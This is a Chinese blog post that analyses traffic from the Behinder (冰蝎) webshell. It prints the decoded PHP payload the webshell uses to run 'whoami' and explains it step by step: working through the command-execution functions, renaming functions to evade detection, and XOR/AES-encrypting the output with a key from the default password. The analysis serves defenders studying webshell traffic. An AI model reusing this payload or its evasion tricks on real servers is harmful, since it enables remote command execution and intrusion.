

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Gnguyd">
  <meta name="keywords" content="">
  
    <meta name="description" content="冰蝎命令执行分析一.执行whoami命令时,通过在线base64解码出来的代码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485">
<meta property="og:type" content="article">
<meta property="og:title" content="冰蝎命令执行分析">
<meta property="og:url" content="https://zylx77.github.io/2022/07/05/bing-he-ming-ling-zhi-xing-fen-xi/index.html">
<meta property="og:site_name" content="Zylx77">
<meta property="og:description" content="冰蝎命令执行分析一.执行whoami命令时,通过在线base64解码出来的代码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zylx77.github.io/img/bx.jpeg">
<meta property="article:published_time" content="2022-07-05T07:24:33.000Z">
<meta property="article:modified_time" content="2022-11-05T07:49:19.917Z">
<meta property="article:author" content="Gnguyd">
<meta property="article:tag" content="分析">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://zylx77.github.io/img/bx.jpeg">
  
  
  
  <title>冰蝎命令执行分析 - Zylx77</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"zylx77.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Zylx77</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="冰蝎命令执行分析"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-07-05 15:24" pubdate>
          2022年7月5日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          40 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">冰蝎命令执行分析</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="冰蝎命令执行分析"><a href="#冰蝎命令执行分析" class="headerlink" title="冰蝎命令执行分析"></a>冰蝎命令执行分析</h1><h2 id="一-执行whoami命令时-通过在线base64解码出来的代码"><a href="#一-执行whoami命令时-通过在线base64解码出来的代码" class="headerlink" title="一.执行whoami命令时,通过在线base64解码出来的代码"></a>一.执行whoami命令时,通过在线base64解码出来的代码</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>@<span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-variable">$key</span>=<span class="hljs-string">&quot;e45e329feb5d925b&quot;</span>; <span class="hljs-comment">//该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond</span><br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;k&#x27;</span>]=<span class="hljs-variable">$key</span>;<br><span class="hljs-title function_ invoke__">session_write_close</span>();<br><br>@<span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getSafeStr</span>(<span class="hljs-params"><span class="hljs-variable">$str</span></span>)</span>&#123;<br>  <span class="hljs-variable">$s1</span> = <span class="hljs-title function_ invoke__">iconv</span>(<span class="hljs-string">&#x27;utf-8&#x27;</span>,<span class="hljs-string">&#x27;gbk//IGNORE&#x27;</span>,<span class="hljs-variable">$str</span>);<br>  <span class="hljs-variable">$s0</span> = <span class="hljs-title function_ invoke__">iconv</span>(<span class="hljs-string">&#x27;gbk&#x27;</span>,<span class="hljs-string">&#x27;utf-8//IGNORE&#x27;</span>,<span class="hljs-variable">$s1</span>);<br>  <span class="hljs-keyword">if</span>(<span class="hljs-variable">$s0</span> == <span class="hljs-variable">$str</span>)&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$s0</span>;<br>  &#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">iconv</span>(<span class="hljs-string">&#x27;gbk&#x27;</span>,<span class="hljs-string">&#x27;utf-8//IGNORE&#x27;</span>,<span class="hljs-variable">$str</span>);<br>  &#125;<br>&#125;<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">main</span>(<span class="hljs-params"><span class="hljs-variable">$cmd</span>,<span class="hljs-variable">$path</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>  @<span class="hljs-title function_ invoke__">set_time_limit</span>(<span class="hljs-number">0</span>);<br>  @<span class="hljs-title function_ invoke__">ignore_user_abort</span>(<span class="hljs-number">1</span>);<br>  @<span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;max_execution_time&#x27;</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-variable">$result</span> = <span class="hljs-keyword">array</span>();<br>  <span class="hljs-variable">$PadtJn</span> = @<span class="hljs-title function_ invoke__">ini_get</span>(<span class="hljs-string">&#x27;disable_functions&#x27;</span>);<br>  <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">empty</span>(<span class="hljs-variable">$PadtJn</span>)) &#123;<br>    <span class="hljs-variable">$PadtJn</span> = <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/[, ]+/&#x27;</span>, <span class="hljs-string">&#x27;,&#x27;</span>, <span class="hljs-variable">$PadtJn</span>);<br>    <span class="hljs-variable">$PadtJn</span> = <span class="hljs-title function_ invoke__">explode</span>(<span class="hljs-string">&#x27;,&#x27;</span>, <span class="hljs-variable">$PadtJn</span>);<br>    <span class="hljs-variable">$PadtJn</span> = <span class="hljs-title function_ invoke__">array_map</span>(<span class="hljs-string">&#x27;trim&#x27;</span>, <span class="hljs-variable">$PadtJn</span>);<br>  &#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-variable">$PadtJn</span> = <span class="hljs-keyword">array</span>();<br>  &#125;<br>  <span class="hljs-variable">$c</span> = <span class="hljs-variable">$cmd</span>;<br>  <span class="hljs-keyword">if</span> (<span class="hljs-literal">FALSE</span> !== <span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-title function_ invoke__">strtolower</span>(*PHP_OS*), <span class="hljs-string">&#x27;win&#x27;</span>)) &#123;<br>    <span class="hljs-variable">$c</span> = <span class="hljs-variable">$c</span> . <span class="hljs-string">&quot; 2&gt;&amp;1\n&quot;</span>;<br>  &#125;<br>  <span class="hljs-variable">$JueQDBH</span> = <span class="hljs-string">&#x27;is_callable&#x27;</span>;<br>  <span class="hljs-variable">$Bvce</span> = <span class="hljs-string">&#x27;in_array&#x27;</span>;<br>  <span class="hljs-keyword">if</span> (<span class="hljs-variable">$JueQDBH</span>(<span class="hljs-string">&#x27;system&#x27;</span>) <span class="hljs-keyword">and</span> ! <span class="hljs-variable">$Bvce</span>(<span class="hljs-string">&#x27;system&#x27;</span>, <span class="hljs-variable">$PadtJn</span>)) &#123;<br>    <span class="hljs-title function_ invoke__">ob_start</span>();<br>    <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$c</span>);<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-title function_ invoke__">ob_get_contents</span>();<br>    <span class="hljs-title function_ invoke__">ob_end_clean</span>();<br>  &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-variable">$JueQDBH</span>(<span class="hljs-string">&#x27;proc_open&#x27;</span>) <span class="hljs-keyword">and</span> ! <span class="hljs-variable">$Bvce</span>(<span class="hljs-string">&#x27;proc_open&#x27;</span>, <span class="hljs-variable">$PadtJn</span>)) &#123;<br>    <span class="hljs-variable">$handle</span> = <span class="hljs-title function_ invoke__">proc_open</span>(<span class="hljs-variable">$c</span>, <span class="hljs-keyword">array</span>(<br>      <span class="hljs-keyword">array</span>(<br>        <span class="hljs-string">&#x27;pipe&#x27;</span>,<br>        <span class="hljs-string">&#x27;r&#x27;</span><br>      ),<br>      <span class="hljs-keyword">array</span>(<br>        <span class="hljs-string">&#x27;pipe&#x27;</span>,<br>        <span class="hljs-string">&#x27;w&#x27;</span><br>      ),<br>      <span class="hljs-keyword">array</span>(<br>        <span class="hljs-string">&#x27;pipe&#x27;</span>,<br>        <span class="hljs-string">&#x27;w&#x27;</span><br>      )<br>    ), <span class="hljs-variable">$pipes</span>);<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-literal">NULL</span>;<br>    <span class="hljs-keyword">while</span> (! <span class="hljs-title function_ invoke__">feof</span>(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>])) &#123;<br>      <span class="hljs-variable">$kWJW</span> .= <span class="hljs-title function_ invoke__">fread</span>(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>], <span class="hljs-number">1024</span>);<br>    &#125;<br>    @<span class="hljs-title function_ invoke__">proc_close</span>(<span class="hljs-variable">$handle</span>);<br>  &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-variable">$JueQDBH</span>(<span class="hljs-string">&#x27;passthru&#x27;</span>) <span class="hljs-keyword">and</span> ! <span class="hljs-variable">$Bvce</span>(<span class="hljs-string">&#x27;passthru&#x27;</span>, <span class="hljs-variable">$PadtJn</span>)) &#123;<br>    <span class="hljs-title function_ invoke__">ob_start</span>();<br>    <span class="hljs-title function_ invoke__">passthru</span>(<span class="hljs-variable">$c</span>);<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-title function_ invoke__">ob_get_contents</span>();<br>    <span class="hljs-title function_ invoke__">ob_end_clean</span>();<br>  &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-variable">$JueQDBH</span>(<span class="hljs-string">&#x27;shell_exec&#x27;</span>) <span class="hljs-keyword">and</span> ! <span class="hljs-variable">$Bvce</span>(<span class="hljs-string">&#x27;shell_exec&#x27;</span>, <span class="hljs-variable">$PadtJn</span>)) &#123;<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-title function_ invoke__">shell_exec</span>(<span class="hljs-variable">$c</span>);<br>  &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-variable">$JueQDBH</span>(<span class="hljs-string">&#x27;exec&#x27;</span>) <span class="hljs-keyword">and</span> ! <span class="hljs-variable">$Bvce</span>(<span class="hljs-string">&#x27;exec&#x27;</span>, <span class="hljs-variable">$PadtJn</span>)) &#123;<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-keyword">array</span>();<br>    <span class="hljs-title function_ invoke__">exec</span>(<span class="hljs-variable">$c</span>, <span class="hljs-variable">$kWJW</span>);<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-title function_ invoke__">join</span>(<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">10</span>), <span class="hljs-variable">$kWJW</span>) . <span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">10</span>);<br>  &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-variable">$JueQDBH</span>(<span class="hljs-string">&#x27;exec&#x27;</span>) <span class="hljs-keyword">and</span> ! <span class="hljs-variable">$Bvce</span>(<span class="hljs-string">&#x27;popen&#x27;</span>, <span class="hljs-variable">$PadtJn</span>)) &#123;<br>    <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">popen</span>(<span class="hljs-variable">$c</span>, <span class="hljs-string">&#x27;r&#x27;</span>);<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-literal">NULL</span>;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_resource</span>(<span class="hljs-variable">$fp</span>)) &#123;<br>      <span class="hljs-keyword">while</span> (! <span class="hljs-title function_ invoke__">feof</span>(<span class="hljs-variable">$fp</span>)) &#123;<br>        <span class="hljs-variable">$kWJW</span> .= <span class="hljs-title function_ invoke__">fread</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-number">1024</span>);<br>      &#125;<br>    &#125;<br>    @<span class="hljs-title function_ invoke__">pclose</span>(<span class="hljs-variable">$fp</span>);<br>  &#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-variable">$kWJW</span> = <span class="hljs-number">0</span>;<br>    <span class="hljs-variable">$result</span>[<span class="hljs-string">&quot;status&quot;</span>] = <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-string">&quot;fail&quot;</span>);<br>    <span class="hljs-variable">$result</span>[<span class="hljs-string">&quot;msg&quot;</span>] = <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-string">&quot;none of proc_open/passthru/shell_exec/exec/exec is available&quot;</span>);<br>    <span class="hljs-variable">$key</span> = <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;k&#x27;</span>];<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">encrypt</span>(<span class="hljs-title function_ invoke__">json_encode</span>(<span class="hljs-variable">$result</span>), <span class="hljs-variable">$key</span>);<br>    <span class="hljs-keyword">return</span>;<br><br>  &#125;<br>  <span class="hljs-variable">$result</span>[<span class="hljs-string">&quot;status&quot;</span>] = <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-string">&quot;success&quot;</span>);<br>  <span class="hljs-variable">$result</span>[<span class="hljs-string">&quot;msg&quot;</span>] = <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-title function_ invoke__">getSafeStr</span>(<span class="hljs-variable">$kWJW</span>));<br>  <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">encrypt</span>(<span class="hljs-title function_ invoke__">json_encode</span>(<span class="hljs-variable">$result</span>),  <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;k&#x27;</span>]);<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">encrypt</span>(<span class="hljs-params"><span class="hljs-variable">$data</span>,<span class="hljs-variable">$key</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">extension_loaded</span>(<span class="hljs-string">&#x27;openssl&#x27;</span>))<br>  &#123;<br>    <span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>;<span class="hljs-variable">$i</span>&lt;<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$data</span>);<span class="hljs-variable">$i</span>++) &#123;<br>      <span class="hljs-variable">$data</span>[<span class="hljs-variable">$i</span>] = <span class="hljs-variable">$data</span>[<span class="hljs-variable">$i</span>]^<span class="hljs-variable">$key</span>[<span class="hljs-variable">$i</span>+<span class="hljs-number">1</span>&amp;<span class="hljs-number">15</span>];<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$data</span>;<br>  &#125;<br>  <span class="hljs-keyword">else</span><br>  &#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">openssl_encrypt</span>(<span class="hljs-variable">$data</span>, <span class="hljs-string">&quot;AES128&quot;</span>, <span class="hljs-variable">$key</span>);<br>  &#125;<br>&#125;<br><span class="hljs-variable">$cmd</span>=<span class="hljs-string">&quot;Y2QgL2QgIkM6XHBocFN0dWR5XFdXV1wiJndob2FtaQ==&quot;</span>;<br><span class="hljs-variable">$cmd</span>=<span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$cmd</span>);<br><span class="hljs-variable">$path</span>=<span class="hljs-string">&quot;QzovcGhwU3R1ZHkvV1dXLw==&quot;</span>;<br><span class="hljs-variable">$path</span>=<span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$path</span>);<br><span class="hljs-title function_ invoke__">main</span>(<span class="hljs-variable">$cmd</span>,<span class="hljs-variable">$path</span>);<br><br><br></code></pre></td></tr></table></figure>



<h2 id="二-将命令进行解码调用函数去执行命令"><a href="#二-将命令进行解码调用函数去执行命令" class="headerlink" title="二.将命令进行解码调用函数去执行命令"></a>二.将命令进行解码调用函数去执行命令</h2><p>$cmd解码为:</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs 1c">cd /d <span class="hljs-string">&quot;C:\phpStudy\WWW\&quot;</span><span class="hljs-meta">&amp;whoami</span><br></code></pre></td></tr></table></figure>

<p>$path解码为:</p>
<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arcade">C:<span class="hljs-regexp">/phpStudy/</span>WWW/<br></code></pre></td></tr></table></figure>

<p>通过调用main($cmd,$path);来开始执行命令</p>
<p><img src="wps1.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="三-调用main函数"><a href="#三-调用main函数" class="headerlink" title="三.调用main函数"></a>三.调用main函数</h2><p>@set_time_limit(0)是用来设置允许脚本运行的时间，单位为秒。</p>
<p>@ignore_user_abort(1) 是用来    设置与远程客户机断开是否会终止脚本的执行,如果设置为 TRUE(1)，则忽略与用户的断开（脚本将继续运行）</p>
<p>@ini_set(‘max_execution_time’,0) 是该选项在脚本的整个执行过程中保持有效</p>
<p>使用$PadtJn 来接收通过@ini_get()获取在php.ini里变量值中的disable_functions,即禁止使用的函数—用于判断是否设置了不可使用的函数</p>
<p><img src="wps2.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="四-判断是否有禁用的函数"><a href="#四-判断是否有禁用的函数" class="headerlink" title="四.判断是否有禁用的函数"></a>四.判断是否有禁用的函数</h2><p>判断$PadtJn是否为空,即有没有设置禁用的函数;如果为空直接将一个空数组赋值给$PadtJn;如果不为空则将disable_functions使用逗号分割并去除两边的空格并放入数组中赋值给$PadtJn</p>
<p><img src="wps3.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="五-判断是否是windows系统"><a href="#五-判断是否是windows系统" class="headerlink" title="五.判断是否是windows系统"></a>五.判断是否是windows系统</h2><p>将输入的$cmd赋值给$c,接着判断系统是不是windows系统,并且使用strpos函数查找win在PHP_OS(WINNT)中第一次出现的位置（区分大小写）</p>
<p>strpos(strtolower(PHP_OS), ‘win’)的值最终为0,即在第一个位置就匹配到了</p>
<p>$c拼接命令 “2&gt;&amp;1\n” 又再次赋值给$c,即$c当前值为:”cd /d “C:\phpStudy\WWW&quot;&amp;whoami 2&gt;&amp;1\n”</p>
<p><img src="wps4.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="六-设置免杀绕过"><a href="#六-设置免杀绕过" class="headerlink" title="六.设置免杀绕过"></a>六.设置免杀绕过</h2><p>将”is_callable”和”in_array”两个函数分别赋值给$JueQDBH和$Bvce;通过这两个新定义的变量去调用两个函数,去判断一些命令执行函数是否是回调函数并且是不是系统设置的disable_functions中</p>
<p><img src="wps5.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="七-设置免杀绕过并-执行命令"><a href="#七-设置免杀绕过并-执行命令" class="headerlink" title="七.设置免杀绕过并,执行命令"></a>七.设置免杀绕过并,执行命令</h2><p>ob_start()- 打开输出缓冲区，所有的输出信息不再直接发送到浏览器，而是保存在输出缓冲区里面</p>
<p>使用<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E5%9B%9E%E8%B0%83&spm=1001.2101.3001.7020">回调</a>函数system()处理信息,执行命令。</p>
<p>使用$KWJW接收 通过ob_get_contents();  获取的 缓冲区的内容</p>
<p>ob_end_clean();    删除内部缓冲区的内容，关闭缓冲区(不输出)。</p>
<p><img src="wps6.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="八-命令执行成功之后-将成功信息进行编码"><a href="#八-命令执行成功之后-将成功信息进行编码" class="headerlink" title="八.命令执行成功之后,将成功信息进行编码"></a>八.命令执行成功之后,将成功信息进行编码</h2><p>执行完成后将success进行base64编码放入到关联数组result中下标为status</p>
<p><img src="wps7.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="九-将执行的结果进行字符转化看是否有乱码-如果无乱码进行base64编码"><a href="#九-将执行的结果进行字符转化看是否有乱码-如果无乱码进行base64编码" class="headerlink" title="九.将执行的结果进行字符转化看是否有乱码,如果无乱码进行base64编码"></a>九.将执行的结果进行字符转化看是否有乱码,如果无乱码进行base64编码</h2><p>调用函数getSafeStr将获取的缓冲区信息$KWJW进行utf-8和gbk进行相互!!!!编码!!!,如果utf-8和gbk进行转化之后结果仍然相等,说明命令没有乱码,就返回给关联数组中下标为msg并进行了一次base64编码</p>
<p><img src="wps8.jpg" srcset="/img/loading.gif" lazyload> </p>
<p><img src="wps9.jpg" srcset="/img/loading.gif" lazyload> </p>
<h2 id="十-将命令结果进行json编码-最终再次与k值加一进行异或编码"><a href="#十-将命令结果进行json编码-最终再次与k值加一进行异或编码" class="headerlink" title="十.将命令结果进行json编码,最终再次与k值加一进行异或编码"></a>十.将命令结果进行json编码,最终再次与k值加一进行异或编码</h2><p>最后将关联数组进行json编码,然后调用函数encrypt将json编码后的关联数组和k值作为参数传入函数中.</p>
<p>进入函数中就判断是否存在openssl值不存在取反之后进入编码,判断关联数组json编码后的长度值,然后根据长度进行遍历,每遍历一次就将data值与key值加一进行异或,最终将data值都进行了编码最终返回编码后的$data</p>
<p><img src="wps10.jpg" srcset="/img/loading.gif" lazyload> </p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" class="category-chain-item">流量分析</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
